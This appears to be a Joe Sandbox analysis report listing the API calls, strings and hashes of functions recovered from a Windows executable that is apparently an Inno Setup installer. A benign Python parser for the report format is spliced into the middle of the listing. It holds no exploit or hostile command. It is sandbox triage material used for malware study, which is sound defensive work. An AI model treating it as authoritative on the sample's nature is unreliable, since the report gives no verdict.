• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
Strings
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
Strings
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C62
• SaveDC.GDI32(?), ref: 00416C93
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
• RestoreDC.GDI32(?,?), ref: 00416D1B
• EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• String ID:
• API String ID: 3808407030-0
APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                • 73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                Similarity
                                                                                • API ID: MetricsSystem$A570A6310DeleteObject
                                                                                • String ID:
                                                                                • API String ID: 3435189566-0
                                                                                APIs
                                                                                  • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                Strings
                                                                                • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                                • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                                • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                • API String ID: 1452528299-4018462623
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                APIs
                                                                                • 73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                Similarity
                                                                                • API ID: E922E98830$A480
                                                                                • String ID:
                                                                                • API String ID: 3692852386-0
                                                                                APIs
                                                                                • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                Similarity
                                                                                • API ID: Enum$NameOpenResourceUniversal
                                                                                • String ID: Z
                                                                                • API String ID: 3604996873-1505515367
                                                                                APIs
                                                                                • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                Similarity
                                                                                • API ID: DrawText$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 182455014-2867612384
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                                • 73E9A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                Similarity
                                                                                • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                • String ID: ...\
                                                                                • API String ID: 2998766281-983595016
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: .tmp$_iu
                                                                                • API String ID: 3498533004-10593223
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                • RegisterClassA.USER32(?), ref: 004164DE
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$Move
                                                                                • String ID: isRS-%.3u.tmp
                                                                                • API String ID: 3839737484-3657609586
                                                                                • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
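The "APIs" bullets in these blocks follow a fixed grammar: `Api.MODULE(args), ref: address`, with an optional `Part of subcall function XXXXXXXX:` prefix for calls made inside a callee, and flag values annotated as `00000001(MOVEFILE_REPLACE_EXISTING)`. As an added example that is not part of the Joe Sandbox report, the following Python parses those bullets into per-function call sequences so a triager can ask, for instance, which recovered functions rename files and with which MoveFileExA flags. The regular expression is inferred from the lines visible in this report, the sample input is copied from the blocks above, and all function and type names are ours.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox IDA-plugin report.

Added example (not Joe Sandbox code): the line grammar in CALL_RE is inferred
from the report's visible lines; SAMPLE is constructed by copying report lines.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed input: three function blocks copied verbatim from the report.
SAMPLE = """\
APIs
• GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
APIs
  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
Strings
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
"""

# One call bullet: optional subcall prefix, Api.MODULE, optional (args), ref: address.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# A value the plugin annotated with its symbolic flag name, e.g. 00000001(MOVEFILE_REPLACE_EXISTING).
FLAG_RE = re.compile(r"^(?P<val>[0-9A-Fa-f]{8})\((?P<name>\w+)\)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                    # address of the call instruction
    subcall_of: Optional[str]   # set when the call is made by a callee, not this function


@dataclass
class FunctionBlock:
    api_id: str = ""
    string_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)


def split_args(s: str) -> List[str]:
    """Split on top-level commas only, so an annotated flag value stays in one piece."""
    out, cur, depth = [], [], 0
    for ch in s:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur:
        out.append("".join(cur))
    return out


def parse_report(text: str) -> List[FunctionBlock]:
    """Group the report into FunctionBlocks; only bullets under 'APIs' are parsed as calls."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            in_apis = True
            continue
        if cur is None:
            continue
        if line in ("Strings", "Memory Dump Source", "Similarity"):
            in_apis = False  # bullets in these sections are strings/metadata, not calls
            continue
        m = CALL_RE.match(line) if in_apis else None
        if m:
            cur.calls.append(ApiCall(m["api"], m["mod"], split_args(m["args"] or ""), m["ref"], m["sub"]))
        elif line.startswith("• API ID: "):
            cur.api_id = line[len("• API ID: "):]
        elif line.startswith("• String ID: "):
            cur.string_id = line[len("• String ID: "):]
    return blocks


def call_sequence(block: FunctionBlock, include_subcalls: bool = False) -> List[str]:
    """Calls in listing order as MODULE!Api; callee calls are dropped unless requested."""
    return [f"{c.module}!{c.api}" for c in block.calls if include_subcalls or c.subcall_of is None]


def decode_flags(call: ApiCall) -> Dict[int, Tuple[str, str]]:
    """Map argument position -> (raw value, symbolic name) for plugin-annotated flag arguments."""
    return {i: (m["val"], m["name"]) for i, a in enumerate(call.args) if (m := FLAG_RE.match(a))}


def functions_calling(blocks: List[FunctionBlock], api: str) -> List[str]:
    """API IDs of functions whose own body (not a callee) calls `api`."""
    return [b.api_id for b in blocks if any(c.api == api and c.subcall_of is None for c in b.calls)]


if __name__ == "__main__":
    for b in parse_report(SAMPLE):
        print(f"{b.api_id:<60} {' -> '.join(call_sequence(b, include_subcalls=True))}")
        for c in b.calls:
            for pos, (val, name) in decode_flags(c).items():
                print(f"    {c.api} arg{pos} = {val} ({name})  @ {c.ref}")
```

Running it over the full report text instead of SAMPLE gives one line per recovered function; filtering with `functions_calling(blocks, "MoveFileExA")` or on `decode_flags` is a quick way to find the file-replacement and process-creation routines among the hundreds of listed functions.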
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1220098344-2970929446
                                                                                • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                                • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                • String ID: LoadTypeLib$RegisterTypeLib
                                                                                • API String ID: 1312246647-2435364021
                                                                                • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                                • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                Strings
                                                                                • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                • API String ID: 3850602802-3720027226
                                                                                • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                  • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorHandleLastProcess
                                                                                • String ID: D$x^I
                                                                                • API String ID: 3798668922-903578107
                                                                                • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                APIs
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • GetFocus.USER32 ref: 00478673
                                                                                • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessageStateTextWaitWindow
                                                                                • String ID: Wnd=$%x
                                                                                • API String ID: 1381870634-2927251529
                                                                                • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                APIs
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$LocalSystem
                                                                                • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                • API String ID: 1748579591-1013271723
                                                                                • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                                • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesDeleteErrorLastMove
                                                                                • String ID: DeleteFile$MoveFile
                                                                                • API String ID: 3024442154-139070271
                                                                                • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                                • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                                • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                                Strings
                                                                                • CSDVersion, xrefs: 0048367C
                                                                                • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                • API String ID: 3677997916-1910633163
                                                                                • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
